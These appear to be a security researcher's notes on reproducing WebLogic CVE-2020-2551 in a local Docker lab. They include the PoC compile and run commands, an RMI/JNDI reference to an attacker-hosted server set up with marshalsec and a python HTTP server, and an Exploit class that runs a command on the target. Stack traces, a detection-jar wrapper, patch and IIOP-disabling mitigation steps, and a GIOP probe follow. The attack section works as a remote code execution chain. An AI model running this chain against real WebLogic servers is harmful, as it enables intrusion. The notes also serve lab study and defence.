Required jar:
https://drive.google.com/file/d/1ssc_8kkjLnzVMTO7G2aswIMLxSLD1Ali/view?usp=sharing
# Compile
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp /Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com/cqq/WeblogicCVE_2020_2551.java
# Run
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp /Users/caiqiqi/Downloads/wlclient.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-context/4.3.16.RELEASE/spring-context-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com.cqq.WeblogicCVE_2020_2551 127.0.0.1
Setting up the WebLogic environment
WebLogic environment build tool. Building with Docker 18 failed at first;
after upgrading Docker to 19.03.5 the build succeeded.
The failure may have been a bug in the VirtualBox that Docker bundles?
Reference:
https://blogs.oracle.com/emeapartnerweblogic/weblogic-1212-installation-in-virtualbox-with-0-mhz-by-frank-munz
After it succeeded:
Nan-ge rocks!
Reference:
https://github.com/QAX-A-Team/WeblogicEnvironment
Download WebLogic and the JDK, then:
# Build
docker build --build-arg JDK_PKG=jdk-7u21-linux-x64.tar.gz --build-arg WEBLOGIC_JAR=fmw_12.1.3.0.0_wls.jar -t weblogic12013jdk7u21 .
# Run
docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 --name weblogic12013jdk7u21 weblogic12013jdk7u21
After it starts, check WebLogic's debug port:
it is port 8453.
In the end I used 10.3.6.0 + JDK 7u21
and exploited it successfully with this project's code; the result looks like this:
1. Compile:
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar com/payload/Main.java
2. Run:
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar:. com.payload.Main 127.0.0.1 7001 "rmi://192.168.170.1:1099/Exploit"
javax.naming.NamingException: Unhandled exception in rebind() [Root exception is org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No]
at weblogic.corba.j2ee.naming.Utils.wrapNamingException(Utils.java:83)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:392)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:350)
at javax.naming.InitialContext.rebind(InitialContext.java:427)
at com.payload.Main.main(Main.java:46)
Caused by: org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No
at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:477)
at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:384)
at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:341)
at org.omg.CORBA.portable.ObjectImpl._invoke(ObjectImpl.java:475)
at weblogic.corba.cos.naming._NamingContextAnyStub.rebind_any(_NamingContextAnyStub.java:52)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:378)
... 3 more
Caused by: org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:57)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.lang.reflect.Constructor.newInstance(Constructor.java:526)
at java.lang.Class.newInstance(Class.java:379)
at weblogic.iiop.ReplyMessage.getThrowable(ReplyMessage.java:318)
at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:468)
... 8 more
------------------------
---- No output is echoed back; verify the result yourself ----
------------------------
HTTP server to listen with (serves the payload class):
python3 -m http.server 80
Place the Exploit.class compiled from Exploit.java under it:
// Exploit.java: fetched by the target through the RMI reference below and
// instantiated there, so the constructor body is what runs on the server.
// There is no output echo; the DNS lookup caused by ping is the only signal.
public class Exploit {
    public Exploit() {
        try {
            // Outbound DNS query to a controlled dnslog hostname
            java.lang.Runtime.getRuntime().exec("ping weblogic.f9daa4b2c9be9ad66693.d.zhack.ca");
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }
}
Then create an RMI service with marshalsec:
java -cp /Users/caiqiqi/GitProjects/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.170.1/#Exploit" 1099
At first I thought it was a WebLogic version problem, but later JDK 7u21 + 12.1.3.0 also worked, so the earlier PoC must have been the problem.
(Exploit.java must be compiled with a JDK no newer than the one WebLogic runs on: a newer javac stamps a higher class-file major version into Exploit.class, and the target JVM refuses to load it with UnsupportedClassVersionError, so the payload never executes. With a newer javac, pass -source 1.7 -target 1.7 to emit a JDK 7 class file.)
Compiling Exploit.java with the lower-version javac, the log after success looks like this:
If Exploit.java is compiled with a higher-version javac:
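The version check behind the caveat above can be done without a JVM, because the class-file major version sits in bytes 6-7 of every .class file (magic 0xCAFEBABE, u2 minor, u2 major, big-endian). The following script is an added example, not code from the original notes or from any of the referenced PoC projects; the two sample headers are constructed inline, and the file name in the usage line is hypothetical.

```python
"""Check a compiled .class file's major version against the target JVM.

Added example: a JVM refuses to load a class whose major version is higher
than its own (UnsupportedClassVersionError), so a payload built with JDK 8
(major 52) is silently useless against WebLogic running on JDK 7u21 (major 51).
"""
import struct
import sys

# Class-file major version -> Java release (from the JVM specification).
MAJOR_TO_JAVA = {
    45: "1.1", 46: "1.2", 47: "1.3", 48: "1.4", 49: "5", 50: "6",
    51: "7", 52: "8", 53: "9", 54: "10", 55: "11", 56: "12", 57: "13",
    58: "14", 59: "15", 60: "16", 61: "17",
}
# Inverse map: Java release -> highest major version that release can load.
JAVA_TO_MAJOR = {v: k for k, v in MAJOR_TO_JAVA.items()}


def parse_class_version(data: bytes) -> tuple:
    """Return (minor, major) from the first 8 bytes of a class file.

    Layout: u4 magic 0xCAFEBABE, u2 minor_version, u2 major_version.
    """
    if len(data) < 8:
        raise ValueError("not a class file: fewer than 8 bytes")
    magic, minor, major = struct.unpack(">IHH", data[:8])
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file: bad magic 0x%08x" % magic)
    return minor, major


def loadable_on(major: int, target_java: str) -> bool:
    """True if a class with this major version loads on a JVM of that release."""
    return major <= JAVA_TO_MAJOR[target_java]


def check_payload(data: bytes, target_java: str) -> str:
    """Human-readable verdict for a class header against a target JDK release."""
    minor, major = parse_class_version(data)
    compiled_for = MAJOR_TO_JAVA.get(major, "unknown")
    verdict = "OK" if loadable_on(major, target_java) else "TOO NEW"
    return "compiled for Java %s (major %d.%d), target Java %s: %s" % (
        compiled_for, major, minor, target_java, verdict)


# Constructed sample headers (not real class files): what javac 7 and javac 8
# write into the first 8 bytes.
SAMPLE_JDK7_HEADER = bytes.fromhex("cafebabe00000033")  # major 51 -> Java 7
SAMPLE_JDK8_HEADER = bytes.fromhex("cafebabe00000034")  # major 52 -> Java 8

if __name__ == "__main__":
    # Usage: python check_class_version.py Exploit.class 7   (file name hypothetical)
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            print(check_payload(f.read(8), sys.argv[2]))
    else:
        for hdr in (SAMPLE_JDK7_HEADER, SAMPLE_JDK8_HEADER):
            print(check_payload(hdr, "7"))
```

Run it against Exploit.class with the target's JDK release as the second argument before starting the RMI server; a "TOO NEW" verdict explains a silent failure that otherwise looks identical to a patched target, since neither case produces an echo.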
Reference
https://github.com/Y4er/CVE-2020-2551
If the exploit does not work, see this article:
漫谈WebLogic CVE-2020-2551 (A discussion of WebLogic CVE-2020-2551)
A more general PoC written with reference to this one:
https://github.com/0nise/CVE-2020-2551/blob/master/CVE_2020_2551.java
Detection tool:
https://github.com/shadowsock5/notes/blob/master/CVE-2020-2551.jar
Python integration code for the detection (runs the detection jar above and parses its verdict):
import logging
import subprocess

logger = logging.getLogger(__name__)

JAR_2551 = "2551.jar"      # the detection jar linked above
VULN_YES = "vul ok"        # verdict strings printed by the jar
VULN_NO = "vul error"


def check_cve_2020_2551(host, port, banner, domain):
    """Return True if the jar reports the target as vulnerable.

    banner.domain is the DNS-log hostname the target is made to resolve;
    the jar's verdict is read from its third output line, as in the original
    snippet, but guarded so shorter output does not raise IndexError.
    """
    command = [
        "java", "-jar", JAR_2551, host, str(port),
        "http://{0}.{1}/cve_2020_2551".format(banner, domain),
    ]
    print(" ".join(command))
    # Read the command's output in as a list of lines (replaces os.popen).
    result = subprocess.run(command, capture_output=True, text=True)
    info = result.stdout.splitlines()
    for line in info:
        logger.info(line)
    is_vuln = False
    if len(info) > 2:
        vuln_flag = info[2]
        if VULN_YES in vuln_flag:
            is_vuln = True
        elif VULN_NO in vuln_flag:
            is_vuln = False
    return is_vuln
Fix
Install the patch update following this link: https://www.oracle.com/security-alerts/cpujan2020.html
Mitigation:
The vulnerability can be mitigated by temporarily disabling the IIOP protocol. Steps:
In the WebLogic console, go to Environment -> Servers -> AdminServer -> Protocols and uncheck "Enable IIOP". Restart WebLogic for the setting to take effect. The setting is per server, so repeat it for every managed server that is reachable.
Before disabling IIOP takes effect:
After it takes effect:
Reference:
- https://docs.oracle.com/middleware/11119/wls/WLACH/taskhelp/channels/EnableAndConfigureIIOP.html
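Whether the mitigation took effect can be verified from the network side: WebLogic speaks IIOP as GIOP (the CORBA wire protocol) on the same listen port as T3 and HTTP, so a port that still answers a GIOP message with a GIOP message still has IIOP enabled. The probe below is an added example, not part of the original notes or of any Oracle tooling. It assumes that a server with IIOP disabled closes the connection instead of replying (the "End-of-stream" COMM_FAILURE shown in the troubleshooting section), and that any GIOP-aware endpoint answers a LocateRequest with some GIOP message, typically a LocateReply even for an unknown object key. The sample reply bytes are constructed, not captured.

```python
"""Probe a WebLogic port for IIOP (GIOP) support.

Added example. Sends a minimal GIOP 1.0 LocateRequest and reports whether the
server answers with a GIOP message. GIOP header (12 bytes): magic "GIOP",
u1 major, u1 minor, u1 flags (bit 0 = little-endian), u1 message type,
u4 message size.
"""
import socket
import struct
import sys

GIOP_MAGIC = b"GIOP"
MSG_LOCATE_REQUEST = 3
MSG_LOCATE_REPLY = 4
MSG_NAMES = {0: "Request", 1: "Reply", 2: "CancelRequest", 3: "LocateRequest",
             4: "LocateReply", 5: "CloseConnection", 6: "MessageError", 7: "Fragment"}


def build_locate_request(request_id: int, object_key: bytes) -> bytes:
    """GIOP 1.0 header + LocateRequest body (u4 request_id, sequence<octet> key)."""
    body = struct.pack(">II", request_id, len(object_key)) + object_key
    header = GIOP_MAGIC + bytes([1, 0, 0, MSG_LOCATE_REQUEST]) + struct.pack(">I", len(body))
    return header + body


def parse_giop_header(data: bytes) -> dict:
    """Parse a 12-byte GIOP header; raise ValueError if the bytes are not GIOP."""
    if len(data) < 12 or data[:4] != GIOP_MAGIC:
        raise ValueError("not a GIOP message")
    major, minor, flags, msg_type = data[4], data[5], data[6], data[7]
    little_endian = bool(flags & 1)
    size = struct.unpack("<I" if little_endian else ">I", data[8:12])[0]
    return {"version": (major, minor), "type": MSG_NAMES.get(msg_type, msg_type), "size": size}


def classify_response(data: bytes) -> bool:
    """True when the server's first bytes are a GIOP header, False otherwise.

    Empty data means the server closed the socket without answering, which is
    what the IIOP-disabled case looks like from the client (End-of-stream).
    """
    if not data:
        return False
    try:
        parse_giop_header(data)
        return True
    except ValueError:
        return False


def iiop_enabled(host: str, port: int, timeout: float = 5.0) -> bool:
    """Live check. A refused connection propagates: that is a closed port, not IIOP off."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_locate_request(1, b"NameService"))  # object key is arbitrary
        try:
            data = s.recv(12)
        except OSError:          # timeout or reset: treat as no GIOP service
            return False
    return classify_response(data)


# Constructed sample reply (not captured from a real server): a GIOP 1.0
# LocateReply header announcing an 8-byte body.
SAMPLE_LOCATE_REPLY = GIOP_MAGIC + bytes([1, 0, 0, MSG_LOCATE_REPLY]) + struct.pack(">I", 8)

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 7001
    print("IIOP enabled on %s:%d: %s" % (host, port, iiop_enabled(host, port)))
```

Run it once before and once after the console change and restart; the expected transition is True to False on the AdminServer port, and the same probe against each managed server's port shows whether the setting was applied there too.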
Miscellaneous
On com.bea.core.repackaged
At first I assumed the JtaTransactionManager in the PoC
was Spring's own org.springframework.transaction.jta.JtaTransactionManager;
after reading other people's PoCs I realised the class is WebLogic's bundled com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager.
I did not dig further.
Troubleshooting
If the following error appears, IIOP may be disabled on the target:
Exception in thread "main" javax.naming.NamingException: Couldn't connect to the specified host : [Root exception is org.omg.CORBA.COMM_FAILURE: vmcid: SUN minor code: 208 completed: Maybe]
at weblogic.corba.j2ee.naming.Utils.wrapNamingException(Utils.java:83)
at weblogic.corba.j2ee.naming.ORBHelper.getORBReferenceWithRetry(ORBHelper.java:656)
at weblogic.corba.j2ee.naming.ORBHelper.getORBReference(ORBHelper.java:594)
at weblogic.corba.j2ee.naming.InitialContextFactoryImpl.getInitialContext(InitialContextFactoryImpl.java:85)
at weblogic.corba.j2ee.naming.InitialContextFactoryImpl.getInitialContext(InitialContextFactoryImpl.java:31)
at weblogic.jndi.WLInitialContextFactory.getInitialContext(WLInitialContextFactory.java:46)
at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:684)
at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313)
at javax.naming.InitialContext.init(InitialContext.java:244)
at javax.naming.InitialContext.<init>(InitialContext.java:216)
at ysoserial.CVE_2020_2551.main(CVE_2020_2551.java:20)
Caused by: org.omg.CORBA.COMM_FAILURE: vmcid: SUN minor code: 208 completed: Maybe
at com.sun.corba.se.impl.logging.ORBUtilSystemException.connectionAbort(ORBUtilSystemException.java:2400)
at com.sun.corba.se.impl.logging.ORBUtilSystemException.connectionAbort(ORBUtilSystemException.java:2418)
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readBits(SocketOrChannelConnectionImpl.java:372)
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.read(SocketOrChannelConnectionImpl.java:307)
at com.sun.corba.se.impl.transport.ReaderThreadImpl.doWork(ReaderThreadImpl.java:98)
at com.sun.corba.se.impl.orbutil.threadpool.ThreadPoolImpl$WorkerThread.performWork(ThreadPoolImpl.java:490)
at com.sun.corba.se.impl.orbutil.threadpool.ThreadPoolImpl$WorkerThread.run(ThreadPoolImpl.java:519)
Caused by: org.omg.CORBA.COMM_FAILURE: vmcid: SUN minor code: 211 completed: No
at com.sun.corba.se.impl.logging.ORBUtilSystemException.ioexceptionWhenReadingConnection(ORBUtilSystemException.java:2484)
at com.sun.corba.se.impl.logging.ORBUtilSystemException.ioexceptionWhenReadingConnection(ORBUtilSystemException.java:2502)
at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPHeader(MessageBase.java:134)
at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPMessage(MessageBase.java:116)
at com.sun.corba.se.impl.transport.CorbaContactInfoBase.createMessageMediator(CorbaContactInfoBase.java:171)
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readBits(SocketOrChannelConnectionImpl.java:333)
... 4 more
Caused by: java.io.IOException: End-of-stream
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.readFully(SocketOrChannelConnectionImpl.java:684)
at com.sun.corba.se.impl.transport.SocketOrChannelConnectionImpl.read(SocketOrChannelConnectionImpl.java:545)
at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.readGIOPHeader(MessageBase.java:130)
... 7 more
Jars the PoC depends on
- wlfullclient.jar
- com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3
- com.bea.core.repackaged.apache.commons.logging_1.2.1.jar
wlfullclient.jar is not shipped in the WebLogic install directory; it is generated
as follows (reference: the link below):
https://blog.csdn.net/konglongaa/article/details/78220249
E:\Oracle\Middleware10.3.6.0\wlserver_10.3\server\lib> java -jar wljarbuilder.jar
This generates wlfullclient.jar in the lib directory.